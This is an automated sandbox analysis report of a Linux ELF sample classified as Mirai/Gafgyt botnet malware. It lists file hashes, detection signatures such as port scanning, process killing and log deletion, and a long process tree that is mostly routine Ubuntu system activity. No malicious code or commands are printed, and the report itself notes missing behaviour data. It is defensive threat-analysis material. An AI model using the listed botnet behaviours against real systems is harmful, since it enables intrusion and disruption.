Loading ...

Play interactive tourEdit tour

Linux Analysis Report nSg5RM0w0d

Overview

General Information

Sample Name:nSg5RM0w0d
Analysis ID:553468
MD5:5ba84075b6789440e97cb6095ad55c32
SHA1:19c16b64b5482561db39de26034459274b9dfb91
SHA256:65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
Tags:32elfmiraimotorola
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553468
Start date:15.01.2022
Start time:00:09:55
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:nSg5RM0w0d
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/184@16/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: nSg5RM0w0d

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5192, Parent: 1)
  • logrotate (PID: 5192, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5233, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5234, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5235, Parent: 5234)
      • invoke-rc.d (PID: 5235, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5236, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5238, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5242, Parent: 5235, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5243, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5244, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5245, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5246, Parent: 5245)
      • rsyslog-rotate (PID: 5246, Parent: 5245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5247, Parent: 5246, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5194, Parent: 1)
  • install (PID: 5194, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5232, Parent: 1)
  • find (PID: 5232, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5237, Parent: 1)
  • mandb (PID: 5237, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • nSg5RM0w0d (PID: 5278, Parent: 5120, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/nSg5RM0w0d
  • systemd New Fork (PID: 5306, Parent: 1)
  • journalctl (PID: 5306, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5321, Parent: 1)
  • systemd-journald (PID: 5321, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5322, Parent: 1)
  • journalctl (PID: 5322, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5372, Parent: 1)
  • dbus-daemon (PID: 5372, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5383, Parent: 1)
  • whoopsie (PID: 5383, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5386, Parent: 1860)
  • pulseaudio (PID: 5386, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5391, Parent: 1)
  • systemd-logind (PID: 5391, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5394, Parent: 1)
  • rtkit-daemon (PID: 5394, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5454, Parent: 1)
  • polkitd (PID: 5454, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5459, Parent: 1)
  • rsyslogd (PID: 5459, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5461, Parent: 1)
  • agetty (PID: 5461, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5462, Parent: 1320)
  • Default (PID: 5462, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5468, Parent: 1320)
  • Default (PID: 5468, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5469, Parent: 1320)
  • Default (PID: 5469, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5470, Parent: 1)
  • gpu-manager (PID: 5470, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5471, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5472, Parent: 5471)
      • grep (PID: 5472, Parent: 5471, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5473, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5474, Parent: 5473)
      • grep (PID: 5474, Parent: 5473, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5475, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5476, Parent: 5475)
      • grep (PID: 5476, Parent: 5475, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5477, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5478, Parent: 5477)
      • grep (PID: 5478, Parent: 5477, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5479, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5480, Parent: 5479)
      • grep (PID: 5480, Parent: 5479, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5482, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5483, Parent: 5482)
      • grep (PID: 5483, Parent: 5482, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5484, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5485, Parent: 5484)
      • grep (PID: 5485, Parent: 5484, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5488, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5489, Parent: 5488)
      • grep (PID: 5489, Parent: 5488, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5491, Parent: 1)
  • generate-config (PID: 5491, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5492, Parent: 5491, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5493, Parent: 1)
  • gdm-wait-for-drm (PID: 5493, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5498, Parent: 1)
  • gdm3 (PID: 5498, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5503, Parent: 5498)
    • plymouth (PID: 5503, Parent: 5498, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5521, Parent: 5498)
    • gdm-session-worker (PID: 5521, Parent: 5498, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5525, Parent: 5521, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5527, Parent: 5525, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5529, Parent: 5527)
            • false (PID: 5530, Parent: 5529, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5531, Parent: 5525, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5532, Parent: 5531, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5535, Parent: 5498)
    • Default (PID: 5535, Parent: 5498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5536, Parent: 5498)
    • Default (PID: 5536, Parent: 5498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5504, Parent: 1)
  • accounts-daemon (PID: 5504, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5514, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5515, Parent: 5514, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5516, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5517, Parent: 5516)
          • locale (PID: 5517, Parent: 5516, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5518, Parent: 5516)
          • grep (PID: 5518, Parent: 5516, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5544, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5565, Parent: 1)
  • journalctl (PID: 5565, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5566, Parent: 1)
  • systemd-journald (PID: 5566, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5567, Parent: 1)
  • whoopsie (PID: 5567, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5571, Parent: 1)
  • dbus-daemon (PID: 5571, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5575, Parent: 1)
  • systemd-logind (PID: 5575, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5633, Parent: 1)
  • gpu-manager (PID: 5633, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5634, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5635, Parent: 5634)
      • grep (PID: 5635, Parent: 5634, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5636, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5637, Parent: 5636)
      • grep (PID: 5637, Parent: 5636, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5639, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5640, Parent: 5639)
      • grep (PID: 5640, Parent: 5639, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5641, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5641)
      • grep (PID: 5642, Parent: 5641, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5643, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5644, Parent: 5643)
      • grep (PID: 5644, Parent: 5643, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5645, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5646, Parent: 5645)
      • grep (PID: 5646, Parent: 5645, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5650, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5651, Parent: 5650)
      • grep (PID: 5651, Parent: 5650, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5654, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5655, Parent: 5654)
      • grep (PID: 5655, Parent: 5654, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5647, Parent: 1)
  • journalctl (PID: 5647, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5653, Parent: 1)
  • rsyslogd (PID: 5653, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5659, Parent: 1)
  • agetty (PID: 5659, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5660, Parent: 1)
  • generate-config (PID: 5660, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5661, Parent: 5660, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5662, Parent: 1)
  • gdm-wait-for-drm (PID: 5662, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5667, Parent: 1)
  • journalctl (PID: 5667, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5668, Parent: 1)
  • systemd-journald (PID: 5668, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5669, Parent: 1)
  • whoopsie (PID: 5669, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5671, Parent: 1)
  • dbus-daemon (PID: 5671, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5674, Parent: 1)
  • systemd-logind (PID: 5674, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5697, Parent: 1)
  • gdm3 (PID: 5697, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5738, Parent: 5697)
    • plymouth (PID: 5738, Parent: 5697, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
  • systemd New Fork (PID: 5734, Parent: 1)
  • rsyslogd (PID: 5734, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5740, Parent: 1)
  • agetty (PID: 5740, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5744, Parent: 1)
  • accounts-daemon (PID: 5744, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5751, Parent: 5744, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5752, Parent: 5751, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5753, Parent: 5752, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5754, Parent: 5753)
          • locale (PID: 5754, Parent: 5753, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5755, Parent: 5753)
          • grep (PID: 5755, Parent: 5753, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5746, Parent: 1)
  • systemd-journald (PID: 5746, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5750, Parent: 1)
